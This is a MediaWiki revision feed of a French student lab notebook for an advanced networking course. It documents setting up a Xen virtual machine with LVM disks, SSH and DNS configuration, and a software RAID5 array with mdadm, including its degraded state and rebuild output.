  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=45852</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=45852"/>
				<updated>2017-10-26T14:33:44Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm). Copiez des données sur le RAID5, arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nous créons le volume /dev/md0:&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
créez un RAID5 logiciel avec les trois partitions obtenues (utilisez le paquetage mdadm)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
///&lt;br /&gt;
&lt;br /&gt;
root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=45851</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=45851"/>
				<updated>2017-10-26T14:31:31Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
